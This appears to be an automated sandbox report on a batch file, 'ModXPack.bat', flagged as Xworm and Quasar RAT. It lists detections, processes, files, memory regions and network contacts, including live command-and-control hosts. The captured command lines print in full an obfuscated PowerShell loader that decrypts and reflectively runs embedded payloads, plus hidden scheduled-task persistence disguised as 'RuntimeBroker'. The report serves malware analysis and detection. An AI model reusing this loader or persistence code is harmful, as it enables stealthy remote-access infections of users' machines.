Analysis Overview
SHA256
e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d
Threat Level: Known bad
The file ModXPack.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Quasar payload
Quasar RAT
Xworm
Blocklisted process makes network request
Checks computer location settings
Enumerates physical storage devices
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-13 20:16
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-13 20:16
Reported
2024-04-13 20:17
Platform
win10v2004-20240412-en
Max time kernel
42s
Max time network
61s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModXPack.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModXPack.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_600_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_600.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_600.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_600.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_600.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_600.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ModPack.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_38_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_38.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_38.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_38.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_38.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_38.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | china-earth.gl.at.ply.gg | udp |
| US | 147.185.221.19:14568 | china-earth.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notes-creation.gl.at.ply.gg | udp |
| US | 147.185.221.19:27030 | notes-creation.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:443 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjuxgqbs.m2f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2228-9-0x00000221D1600000-0x00000221D1622000-memory.dmp
memory/2228-10-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/2228-11-0x00000221E9820000-0x00000221E9830000-memory.dmp
memory/2228-12-0x00000221E9820000-0x00000221E9830000-memory.dmp
memory/2228-13-0x00000221CF940000-0x00000221CF948000-memory.dmp
memory/2228-14-0x00000221EBC90000-0x00000221EBE32000-memory.dmp
memory/4084-16-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/4084-27-0x000001B67C8E0000-0x000001B67C8F0000-memory.dmp
memory/4084-26-0x000001B67C8E0000-0x000001B67C8F0000-memory.dmp
memory/4084-28-0x000001B67C8E0000-0x000001B67C8F0000-memory.dmp
memory/4084-31-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f8d49a4af7a844bfc7247d5670def557 |
| SHA1 | 26ae0ce194a77a7a1887cf93741293fdfa6c94c4 |
| SHA256 | 61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b |
| SHA512 | 9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Roaming\startup_str_600.vbs
| MD5 | 8d99f4924ef95453687c157e804c9b60 |
| SHA1 | 5c1033f40b2ff5b82bcd7f3b7327aca73f8c05fb |
| SHA256 | 9c06a5186719d628bd78ca5bf2adb5adf6687f45080be5a453b2466eb0eba7f5 |
| SHA512 | 7e22fa19c08be6f6233d10b338416da20c9f39b8037799930b272b27346a7f58573e55b0bc5b70211c1de4d076128ea97af36e86b6d81f825b71957c9c655a50 |
C:\Users\Admin\AppData\Roaming\startup_str_600.bat
| MD5 | 51d7b8be303abf43851e767d9250887b |
| SHA1 | e795e381647c8a99529f87810347881b6b9bdeba |
| SHA256 | e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d |
| SHA512 | 1ee6999e72bafb69559c1dbeb6ff84e46f94fe1b51a82626d7feabce5619053299872d680520aac791e103a3fb45a6d002180cc166215c59517e6c72dae6ee26 |
memory/4068-40-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/4068-41-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp
memory/4068-42-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp
memory/2228-53-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/4068-56-0x00000204C74C0000-0x00000204C74CE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ModPack.bat
| MD5 | 105f33324f5807a250699b78a8972954 |
| SHA1 | c7e43ef81256e582a290a84a387a2163e35de9fb |
| SHA256 | 636bf2c51b857661bf1125085ee11bc28cf2d8f2cdaa5d44135dd8d87a52a4b5 |
| SHA512 | 162dabf9630be54a2c6775d9f928be6923462b211d9072752341bcdaeae8099b0d49b6710bedd13f894cc72742336728365b44e8f282622487d11fcc9cdc7101 |
memory/2380-65-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/2380-71-0x0000021E33DA0000-0x0000021E33DB0000-memory.dmp
memory/2380-70-0x0000021E33DA0000-0x0000021E33DB0000-memory.dmp
memory/2380-72-0x0000021E33D90000-0x0000021E33D98000-memory.dmp
memory/2380-73-0x0000021E4E0F0000-0x0000021E4E222000-memory.dmp
memory/3456-75-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/3456-86-0x000001806A150000-0x000001806A160000-memory.dmp
memory/3456-85-0x000001806A150000-0x000001806A160000-memory.dmp
memory/3456-87-0x000001806A150000-0x000001806A160000-memory.dmp
memory/3456-89-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 829eca69e3018062c625f2569858bebc |
| SHA1 | d02dc553306bd3b29fa4fb1b789e3d07f251accf |
| SHA256 | 4a6b44ff19a84564fb03e21ed4b088df5a5b969843b47cb36853f33e9ebf8287 |
| SHA512 | 6317f8090385e8cf95f070df12e663210be450dbcbf98f5c7b6bd411750b2876a33386c63497f62916a59804d6ab86bc2420c64cf5806cc1ade9613f44091009 |
C:\Users\Admin\AppData\Roaming\startup_str_38.vbs
| MD5 | 37dd910af3853eec893618d5ac68fc09 |
| SHA1 | 44663de84c4e2ea3502e07a4925b03d6f75262f1 |
| SHA256 | 134fa00d82f1a1edbfd6027b8cb910ba6f71ad91302295fd14dac226e7a6eb4f |
| SHA512 | ad1ae0cb28d4817e4da1704bb8d5ccf8503efea59117696b72552986aaf22dc99dbed995aa7423e36881faddaf066c7e3481e37d2d27deb4d5a3347d4fc03583 |
memory/3076-97-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/2380-99-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/3076-98-0x0000017441700000-0x0000017441710000-memory.dmp
memory/3076-110-0x000001745DA50000-0x000001745DB82000-memory.dmp
memory/3076-111-0x000001745DBB0000-0x000001745DED4000-memory.dmp
memory/3076-112-0x0000017441700000-0x0000017441710000-memory.dmp
memory/3076-113-0x000001745E230000-0x000001745E280000-memory.dmp
memory/3076-114-0x000001745E340000-0x000001745E3F2000-memory.dmp
memory/3076-115-0x000001745EE70000-0x000001745F032000-memory.dmp
memory/3076-116-0x000001745E200000-0x000001745E212000-memory.dmp
memory/3076-117-0x000001745E2C0000-0x000001745E2FC000-memory.dmp
memory/4068-118-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/4068-120-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp
memory/4068-119-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp
memory/3076-121-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp
memory/3076-122-0x0000017441700000-0x0000017441710000-memory.dmp
memory/3076-123-0x0000017441700000-0x0000017441710000-memory.dmp
memory/3076-124-0x0000017441700000-0x0000017441710000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-13 20:16
Reported
2024-04-13 20:17
Platform
win11-20240412-en
Max time kernel
41s
Max time network
61s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModXPack.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModXPack.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_750_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_750.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_750.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_750.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_750.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_750.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ModPack.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
